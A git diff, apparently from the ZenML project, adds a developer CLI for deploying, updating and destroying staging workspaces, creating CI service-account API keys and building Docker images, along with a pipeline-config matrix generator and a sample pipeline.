helm_version: Optional[str], + docker_image: Optional[str], +): + """Deploy a new workspace with the given configuration. + + Creates a new ZenML workspace in the cloud environment with the specified + configuration parameters. This command will wait for the workspace to become + available before returning. + + If no workspace name is provided, uses the current git branch name (slugified). + If no ZenML version is provided, uses the version from the VERSION file. + + Args: + workspace: Name of the workspace to create. + organization: Organization ID. Defaults to ZENML_DEV_ORGANIZATION_ID env var. + zenml_version: ZenML version to use for the workspace. + helm_version: Helm chart version to use for the workspace deployment. + docker_image: Docker image to use, in the format repository:tag. + + Examples: + $ ./zen-dev deploy + $ ./zen-dev deploy --workspace my-workspace --zenml-version 0.40.0 + $ ./zen-dev deploy --zenml-version 0.40.0 --docker-image zenmldocker/zenml-server:custom + """ + # Use default workspace name if not provided + if workspace is None: + workspace = get_default_workspace_name() + click.echo(f"Using git branch as workspace name: {workspace}") + + # Use default ZenML version if not provided + if zenml_version is None: + zenml_version = get_zenml_version() + if zenml_version: + click.echo(f"Using ZenML version from VERSION file: {zenml_version}") + else: + click.echo("Warning: No ZenML version specified and VERSION file not found") + return + + click.echo(f"Deploying workspace: {workspace}") + + token = get_auth_token() + + configuration = _build_configuration( + zenml_version=zenml_version, + docker_image=docker_image, + helm_chart_version=helm_version, + ) + + try: + workspace_data = create_workspace( + token=token, + workspace_name=workspace, + organization_id=organization, + configuration=configuration, + ) + click.echo(f"Workspace created with ID: {workspace_data['id']}") + + wait_for_availability(token, workspace_data["id"]) + + click.echo( + "Workspace deployed! Access it at: " + f"https://staging.cloud.zenml.io/workspaces/{workspace}/projects" + ) + except Exception as e: + click.echo(f"Error deploying workspace: {str(e)}", err=True) + sys.exit(1) + + +@cli.command("update") +@click.option( + "--workspace", + help="Name or ID of the workspace to update (defaults to slugified git branch name)", + default=None +) +@click.option( + "--zenml-version", + help="ZenML version to use (defaults to value from VERSION file)", + default=None +) +@click.option( + "--helm-version", + help="Helm chart version to use" +) +@click.option( + "--docker-image", + help="Docker image to use (format: repository:tag)" +) +def update( + workspace: Optional[str], + zenml_version: Optional[str], + helm_version: Optional[str], + docker_image: Optional[str], +): + """Update an existing workspace with the given configuration. + + Updates the configuration of an existing ZenML workspace in the cloud + environment. This command will wait for the workspace update to complete + before returning. + + If no workspace name is provided, uses the current git branch name (slugified). + If no ZenML version is provided, uses the version from the VERSION file. + + Args: + workspace: Name or ID of the workspace to update. + zenml_version: New ZenML version to use for the workspace. + helm_version: New Helm chart version to use for the workspace. + docker_image: New Docker image to use, in the format repository:tag. + + Examples: + $ ./zen-dev update + $ ./zen-dev update --workspace my-workspace --zenml-version 0.40.1 + $ ./zen-dev update --docker-image zenmldocker/zenml-server:new-tag + """ + # Use default workspace name if not provided + if workspace is None: + workspace = get_default_workspace_name() + click.echo(f"Using git branch as workspace name: {workspace}") + + # Use default ZenML version if not provided + if zenml_version is None: + zenml_version = get_zenml_version() + if zenml_version: + click.echo(f"Using ZenML version from VERSION file: {zenml_version}") + else: + click.echo("Warning: No ZenML version specified and VERSION file not found") + return + + click.echo(f"Updating workspace: {workspace}") + + token = get_auth_token() + configuration = _build_configuration( + zenml_version=zenml_version, + docker_image=docker_image, + helm_chart_version=helm_version, + ) + + workspace_response = get_workspace(token, workspace) + + try: + update_workspace( + token=token, + workspace_name_or_id=workspace_response["id"], + configuration=configuration, + ) + click.echo("Workspace update initiated") + + wait_for_availability(token, workspace) + + click.echo( + "Workspace updated! Access it at: " + f"https://staging.cloud.zenml.io/workspaces/{workspace}/projects" + ) + except Exception as e: + click.echo(f"Error updating workspace: {str(e)}", err=True) + sys.exit(1) + + +@cli.command("destroy") +@click.option( + "--workspace", + required=False, + help="ID or name of the workspace to destroy (defaults to slugified git branch name)" +) +@click.option( + "--force", + is_flag=True, + help="Skip confirmation prompt" +) +def destroy(workspace: Optional[str], force: bool): + """Destroy an existing workspace. + + Permanently deletes a ZenML workspace and all associated resources. + By default, this command will prompt for confirmation before proceeding. + + If no workspace is provided, uses the current git branch name (slugified). + + Args: + workspace: ID or name of the workspace to destroy. + force: If True, skip the confirmation prompt. + + Examples: + $ ./zen-dev destroy + $ ./zen-dev destroy --workspace my-workspace + $ ./zen-dev destroy --workspace 123e4567-e89b-12d3-a456-426614174000 --force + """ + # Use default workspace name if not provided + if workspace is None: + workspace = get_default_workspace_name() + click.echo(f"Using git branch as workspace name: {workspace}") + + if not force: + confirm = click.confirm( + f"Are you sure you want to destroy workspace '{workspace}'? " + "This action cannot be undone." + ) + if not confirm: + click.echo("Operation cancelled.") + return + + click.echo(f"Destroying workspace: {workspace}") + + token = get_auth_token() + + try: + # If the workspace is provided as a name (not UUID), get the ID first + try: + uuid_obj = UUID(workspace) + workspace_id = workspace + except ValueError: + # If not a valid UUID, assume it's a name and get the workspace info + workspace_info = get_workspace(token, workspace) + workspace_id = workspace_info["id"] + click.echo(f"Found workspace ID: {workspace_id}") + + destroy_workspace(token, UUID(workspace_id)) + click.echo(f"✅ Workspace '{workspace}' destroyed successfully.") + except Exception as e: + click.echo(f"❌ Error destroying workspace: {str(e)}", err=True) + sys.exit(1) + + +def get_workspace_auth_token(token: str, workspace_id: str) -> str: + """Get a workspace-specific authorization token. + + Args: + token: The access token for the cloud API. + workspace_id: The ID of the workspace to get an authorization token for. + + Returns: + A workspace-specific authorization token. + + Raises: + RuntimeError: If the API request fails for any reason. + """ + url = f"{BASE_STAGING_URL}/auth/workspace_authorization/{workspace_id}" + response = requests.post(url, headers=_get_headers(token)) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + return response.json()["access_token"] + + +def authenticate_with_workspace(server_url: str, workspace_auth_token: str) -> Tuple[str, str]: + """Authenticate with a workspace and get auth cookie and CSRF token. + + Args: + server_url: The URL of the workspace server. + workspace_auth_token: The workspace-specific authorization token. + + Returns: + A tuple of (auth_cookie, csrf_token) for subsequent API requests. + + Raises: + RuntimeError: If authentication fails or if the required tokens are not found. + """ + url = f"{server_url}/api/v1/login" + headers = { + "Authorization": f"Bearer {workspace_auth_token}", + "accept": "application/json" + } + logging.warning(f"URL: {url}") + + response = requests.post(url, headers=headers) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + cookies = response.cookies.get_dict() + csrf_token = response.json().get("csrf_token") + + auth_cookie = cookies.get("zenml-auth") + if auth_cookie is None or csrf_token is None: + raise RuntimeError("Failed to get auth cookie or CSRF token from response") + + return auth_cookie, csrf_token + + +def get_service_account( + server_url: str, + auth_cookie: str, + csrf_token: str, + service_account_name: str +) -> Optional[Dict[str, Any]]: + """Get a service account by name. + + Uses the direct endpoint to get a service account by name or ID, + which is more efficient than listing all service accounts. + + Args: + server_url: The URL of the workspace server. + auth_cookie: The authentication cookie for the workspace. + csrf_token: The CSRF token for the workspace. + service_account_name: The name of the service account to get. + + Returns: + The service account information as a dictionary, or None if not found. + + Raises: + RuntimeError: If the API request fails for any reason other than 404. + """ + url = f"{server_url}/api/v1/service_accounts/{service_account_name}" + headers = { + "Cookie": f"zenml-auth={auth_cookie}", + "X-CSRF-Token": csrf_token, + "Accept": "application/json" + } + + try: + response = requests.get(url, headers=headers) + response.raise_for_status() + return response.json() + except requests.exceptions.HTTPError as e: + if e.response.status_code == 404: + return None + raise RuntimeError( + f"Request failed with response content: {e.response.text}" + ) + except requests.exceptions.RequestException as e: + raise RuntimeError(f"Request failed: {str(e)}") + + +def create_service_account( + server_url: str, + auth_cookie: str, + csrf_token: str, + name: str, + description: str +) -> Dict[str, Any]: + """Create a service account in a workspace. + + Args: + server_url: The URL of the workspace server. + auth_cookie: The authentication cookie for the workspace. + csrf_token: The CSRF token for the workspace. + name: The name for the new service account. + description: The description for the new service account. + + Returns: + The created service account information as a dictionary. + + Raises: + RuntimeError: If the API request fails for any reason. + """ + url = f"{server_url}/api/v1/service_accounts" + headers = { + "Cookie": f"zenml-auth={auth_cookie}", + "X-CSRF-Token": csrf_token, + "Content-Type": "application/json" + } + + payload = { + "name": name, + "description": description, + "active": True + } + + response = requests.post(url, headers=headers, json=payload) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + return response.json() + + +def create_api_key( + server_url: str, + auth_cookie: str, + csrf_token: str, + service_account_id: str, + name: str, + description: str +) -> Dict[str, Any]: + """Create an API key for a service account. + + Args: + server_url: The URL of the workspace server. + auth_cookie: The authentication cookie for the workspace. + csrf_token: The CSRF token for the workspace. + service_account_id: The ID of the service account to create the key for. + name: The name for the new API key. + description: The description for the new API key. + + Returns: + The created API key information as a dictionary. + + Raises: + RuntimeError: If the API request fails for any reason. + """ + url = f"{server_url}/api/v1/service_accounts/{service_account_id}/api_keys" + headers = { + "Cookie": f"zenml-auth={auth_cookie}", + "X-CSRF-Token": csrf_token, + "Content-Type": "application/json" + } + + payload = { + "name": name, + "description": description + } + + response = requests.post(url, headers=headers, json=payload) + try: + response.raise_for_status() + except requests.exceptions.HTTPError: + raise RuntimeError( + f"Request failed with response content: {response.text}" + ) + + return response.json() + + +@cli.command("gh-action-login") +def gh_action_login(): + """(FOR GH ACTIONS ONLY) Authenticate with a workspace with a service account. + + This command authenticates with the GH Runner with a ZenML workspace using + the current git branch name as the workspace name. It creates or reuses a + service account with a standardized name, and generates an API key. It + outputs GitHub Actions compatible commands that mask secrets and set outputs + for subsequent steps. + + Examples: + $ ./zen-dev gh-action-login + """ + try: + # Use git branch name for workspace + workspace = get_default_workspace_name() + click.echo(f"Using git branch as workspace name: {workspace}") + + token = get_auth_token() + + # Get workspace information + workspace_info = get_workspace(token, workspace) + workspace_id = workspace_info["id"] + workspace_name = workspace_info["name"] + server_url = workspace_info["zenml_service"]["status"]["server_url"] + + click.echo(f"Workspace found: {workspace_name} (ID: {workspace_id})") + + # Get workspace authorization token + click.echo("Getting workspace auth token") + workspace_auth_token = get_workspace_auth_token(token, workspace_id) + + # Authenticate with the workspace + click.echo("Authenticating with the workspace") + auth_cookie, csrf_token = authenticate_with_workspace(server_url, workspace_auth_token) + + # Create standard service account name based on workspace name + sa_name = f"github-actions-{workspace_name}" + sa_description = "Service account for GitHub Actions" + + # Check if service account already exists using direct endpoint + existing_sa = get_service_account( + server_url, auth_cookie, csrf_token, sa_name + ) + + if existing_sa: + click.echo(f"Using existing service account: {sa_name} (ID: {existing_sa['id']})") + service_account_id = existing_sa["id"] + else: + # Create a new service account + service_account = create_service_account( + server_url, auth_cookie, csrf_token, sa_name, sa_description + ) + service_account_id = service_account["id"] + click.echo(f"Service account created: {sa_name} (ID: {service_account_id})") + + # Create an API key + api_key_name = f"{sa_name}-key" + api_key_description = "API key for GitHub Actions" + api_key_info = create_api_key( + server_url, auth_cookie, csrf_token, service_account_id, + api_key_name, api_key_description + ) + + api_key = api_key_info["body"]["key"] + click.echo(f"API key created: {api_key_name}") + + # Output GitHub Actions format + print(f"::add-mask::{api_key}") + print(f"::set-output name=server_url::{server_url}") + print(f"::set-output name=api_key::{api_key}") + + except Exception as e: + click.echo(f"Error authenticating with workspace: {str(e)}", err=True) + sys.exit(1) + + +@cli.command("info") +def info(): + """Display information about the current development environment. + + Shows the detected ZenML version from the VERSION file and the + slugified branch name that would be used as a workspace name. + + Examples: + $ ./zen-dev info + """ + branch = get_current_git_branch() + if branch: + click.echo(f"Current git branch: {branch}") + slug = slugify_branch_name(branch) + click.echo(f"Slugified name: {slug}") + else: + click.echo("No git branch detected") + click.echo("Default workspace name: dev") + + version = get_zenml_version() + if version: + click.echo(f"ZenML version: {version}") + else: + click.echo("ZenML version: Could not determine (VERSION file not found)") + + +@cli.command("build") +@click.option( + "--server", + is_flag=True, + help="Build the zenml-server image instead of zenml" +) +@click.option( + "--repo", + required=True, + help="Docker repository name (required)", + envvar="DEV_DOCKER_REPO" +) +@click.option( + "--tag", + default=None, + help="Tag for the Docker image (defaults to slugified git branch name)" +) +@click.option( + "--push", + is_flag=True, + help="Push the image after building" +) +def build(server: bool, repo: str, tag: Optional[str], push: bool): + """Build a ZenML Docker image. + + This command builds a Docker image for ZenML or ZenML Server using + the appropriate dev Dockerfile. By default, it builds the zenml image, + but you can use --server to build the zenml-server image instead. + + If no tag is provided, uses the current git branch name (slugified). + + Args: + server: If True, build the zenml-server image instead of zenml. + repo: Docker repository name (required, can be set with DEV_DOCKER_REPO env var). + tag: Tag for the Docker image (defaults to slugified git branch name). + push: If True, push the image after building. + + Examples: + $ ./zen-dev build --repo zenmldocker + $ ./zen-dev build --server --repo zenmldocker + $ ./zen-dev build --repo zenmldocker --tag v1.0 + $ ./zen-dev build --repo myrepo --tag test + $ ./zen-dev build --repo zenmldocker --push + """ + if not DOCKER_AVAILABLE: + click.echo("Docker Python client not found. Please install with 'pip install docker'", err=True) + sys.exit(1) + + # Use slugified git branch name as default tag if not provided + if tag is None: + tag = get_default_workspace_name() + click.echo(f"Using git branch as tag: {tag}") + + # Determine image type + image_type = "zenml-server" if server else "zenml" + image_name = f"{repo}/{image_type}:{tag}" + + # Build the Docker image + click.echo(f"Building Docker image: {image_name}...") + + try: + client = docker.from_env() + + # Find the Dockerfile path + dockerfile_path = f"docker/{image_type}-dev.Dockerfile" + if not os.path.exists(dockerfile_path): + click.echo(f"Error: Dockerfile not found at {dockerfile_path}", err=True) + sys.exit(1) + + # Build the image + click.echo("Building image... (this may take a while)") + image, logs = client.images.build( + path=".", + dockerfile=dockerfile_path, + tag=image_name, + buildargs={"PYTHON_VERSION": "3.11"}, + platform="linux/amd64", + rm=True + ) + + # Check for errors + for log in logs: + if isinstance(log, dict) and "error" in log: + error = log.get("error", "") + if isinstance(error, str): + click.echo(f"Error building image: {error}", err=True) + sys.exit(1) + + click.echo(f"✅ Successfully built: {image_name}") + + # Push the image if requested + if push: + click.echo(f"Pushing Docker image: {image_name}...") + click.echo("Pushing image... (this may take a while)") + + repository = f"{repo}/{image_type}" + + # Push the image and check for errors + for line in client.images.push(repository=repository, tag=tag, stream=True, decode=True): + if isinstance(line, dict) and "error" in line: + error = line.get("error", "") + if isinstance(error, str): + click.echo(f"Error pushing image: {error}", err=True) + sys.exit(1) + + click.echo(f"✅ Successfully pushed: {image_name}") + + except BuildError as e: + click.echo(f"❌ Error building image: {str(e)}", err=True) + sys.exit(1) + except APIError as e: + click.echo(f"❌ Docker API error: {str(e)}", err=True) + sys.exit(1) + except Exception as e: + click.echo(f"❌ Unexpected error: {str(e)}", err=True) + sys.exit(1) + + +if __name__ == "__main__": + cli() \ No newline at end of file diff --git a/dev/dev_pipelines_config.yaml b/dev/dev_pipelines_config.yaml new file mode 100644 index 00000000000..302340d45ab --- /dev/null +++ b/dev/dev_pipelines_config.yaml @@ -0,0 +1,24 @@ +pipeline_with_tags: + stacks: + default: + aws: + params: + first: + config: "some_config.yaml" + second: + config: "some_second_config.yaml" + +pipeline_with_metadata: + command: "python wow.py" + + stacks: + default: + gcp: requirements.txt + aws: requirements_aws.txt + params: + default: + batch_size: 32 + epochs: 10 + small: + batch_size: 16 + epochs: 5 diff --git a/dev/dev_pipelines_config_parser.py b/dev/dev_pipelines_config_parser.py new file mode 100755 index 00000000000..8210b679728 --- /dev/null +++ b/dev/dev_pipelines_config_parser.py @@ -0,0 +1,219 @@ +# Copyright (c) ZenML GmbH 2023. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at: +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express +# or implied. See the License for the specific language governing +# permissions and limitations under the License. +#!/usr/bin/env python3 + +import os +import sys +import yaml +import json +import argparse +from typing import Dict, List, Optional, Any, Tuple + + +def parse_input_filter(input_str: Optional[str]) -> Tuple[Optional[str], Optional[str], Optional[str]]: + """Parse the input string in the format 'pipeline_name:stack::params'. + + This function takes a filter string and breaks it down into its components + to allow filtering of pipeline configurations. + + Args: + input_str: Input string in the format 'pipeline_name:stack::params'. + Example: 'my_pipeline:aws::small' or 'my_pipeline:aws' or 'my_pipeline' + + Returns: + Tuple of (pipeline_name, stack, params) where stack and params can be None + if not specified in the input string. + """ + if not input_str: + return None, None, None + + parts = input_str.split(':') + pipeline_name = parts[0] if parts else None + + stack = None + params = None + + if len(parts) > 1: + stack_params = parts[1].split('::') + if stack_params[0]: + stack = stack_params[0] + + if len(stack_params) > 1 and stack_params[1]: + params = stack_params[1] + + return pipeline_name, stack, params + + +def load_config_file(file_path: str) -> Dict: + """Load and parse a YAML configuration file. + + Args: + file_path: Path to the configuration file + + Returns: + Dictionary containing the parsed configuration + + Raises: + SystemExit: If the file doesn't exist or can't be parsed + """ + if not os.path.exists(file_path): + print(f"Error: Configuration file '{file_path}' not found") + sys.exit(1) + + try: + with open(file_path, 'r') as file: + return yaml.safe_load(file) + except Exception as e: + print(f"Error loading configuration file: {e}") + sys.exit(1) + + +def format_params_as_cli_args(params: Dict) -> str: + """Format parameters dictionary as command-line arguments. + + Converts a dictionary of parameters into a string of CLI arguments + in the format '--key value'. + + Args: + params: Dictionary of parameters (key-value pairs) + + Returns: + String of command-line arguments formatted as '--key value' + """ + if not params: + return "" + + return " ".join([f"--{key} {value}" for key, value in params.items()]) + + +def generate_configurations(config: Dict, pipeline_filter: Optional[str] = None, + stack_filter: Optional[str] = None, + params_filter: Optional[str] = None) -> List[Dict]: + """Generate all possible configuration combinations based on input filters. + + For each pipeline in the configuration, this function generates all valid + combinations of stack and parameter sets, applying any filters provided. + + Args: + config: Configuration dictionary from the YAML file + pipeline_filter: Optional pipeline name to filter by + stack_filter: Optional stack name to filter by + params_filter: Optional parameter set name to filter by + + Returns: + List of configuration dictionaries with pipeline_name, stack, command, + and formatted parameters + """ + results = [] + + for pipeline_name, pipeline_config in config.items(): + # Skip if pipeline filter is specified and doesn't match + if pipeline_filter and pipeline_name != pipeline_filter: + continue + + command = pipeline_config.get("command", None) + + # Handle different parameter structures + params_dict = pipeline_config.get("params", {}) + + # If params is a direct dictionary, treat it as having a single default params + if params_dict and not any(isinstance(v, dict) for v in params_dict.values()): + param_sets = {"default": params_dict} + else: + param_sets = params_dict or {"default": {}} + + # Get stack information - can be a dictionary with requirements as values + stacks_config = pipeline_config.get("stacks", {"default": None}) + + # If stacks is a list, convert to a dict with None values + if isinstance(stacks_config, list): + stacks_config = {stack: None for stack in stacks_config} + + for stack_name, requirements in stacks_config.items(): + # Skip if stack filter is specified and doesn't match + if stack_filter and stack_name != stack_filter: + continue + + for param_name, param_values in param_sets.items(): + # Skip if params filter is specified and doesn't match + if params_filter and param_name != params_filter: + continue + + config_entry = { + "pipeline_name": pipeline_name, + "stack": stack_name, + } + + if command: + config_entry["command"] = command + + if requirements: + config_entry["requirements"] = requirements + + if param_values: + # Format parameters as CLI arguments + config_entry["params"] = format_params_as_cli_args(param_values) + + results.append(config_entry) + + return results + + +def main(): + """Main entry point for the script. + + Parses command line arguments, loads the configuration file, + generates pipeline configurations, and outputs a GitHub Actions + strategy matrix. + """ + parser = argparse.ArgumentParser( + description="Generate GitHub Actions strategy matrix from pipeline configurations" + ) + parser.add_argument( + "--config", + default="dev/dev_pipelines_config.yaml", + help="Path to the configuration file" + ) + parser.add_argument( + "--input", + help="Filter in format pipeline_name:stack::params" + ) + + args = parser.parse_args() + + # Parse input filter + pipeline_filter, stack_filter, params_filter = parse_input_filter(args.input) + + # Load configuration + config = load_config_file(args.config) + + # Generate configurations + configurations = generate_configurations( + config, + pipeline_filter=pipeline_filter, + stack_filter=stack_filter, + params_filter=params_filter + ) + + # Output GitHub Actions matrix + if not configurations: + print("No matching configurations found.") + else: + # Format for GitHub Actions matrix strategy as JSON + matrix = {"include": configurations} + print(json.dumps(matrix)) + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/dev/pipelines/pipeline_with_metadata/run.py b/dev/pipelines/pipeline_with_metadata/run.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dev/pipelines/pipeline_with_tags/run.py b/dev/pipelines/pipeline_with_tags/run.py new file mode 100644 index 00000000000..ad80c3fd602 --- /dev/null +++ b/dev/pipelines/pipeline_with_tags/run.py @@ -0,0 +1,19 @@ +"""This pipeline is used to test the different sorting mechanisms.""" + +from zenml import pipeline, step + + +@step +def basic_step() -> str: + """Step to return a string.""" + return "Hello, World!" + + +@pipeline(enable_cache=False) +def basic_pipeline(): + """Pipeline with tags.""" + basic_step() + + +if __name__ == "__main__": + basic_pipeline() diff --git a/zen-dev b/zen-dev index 2c9b1e24257..c835b81f0c3 100755 --- a/zen-dev +++ b/zen-dev @@ -1,5 +1,5 @@ -#!/usr/bin/env python -# Copyright (c) ZenML GmbH 2023. All Rights Reserved. +#!/usr/bin/env python3 +# Copyright (c) ZenML GmbH 2025. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -12,12 +12,15 @@ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express # or implied. See the License for the specific language governing # permissions and limitations under the License. -""" CLI callable through `./zen-dev ....`. +"""CLI callable through `./zen-dev ....`. This CLI will serve as a general interface for all convenience functions -during development.""" -from scripts.verify_flavor_url_valid import cli +during development. +""" + import sys +from dev.cli import cli + if __name__ == "__main__": sys.exit(cli())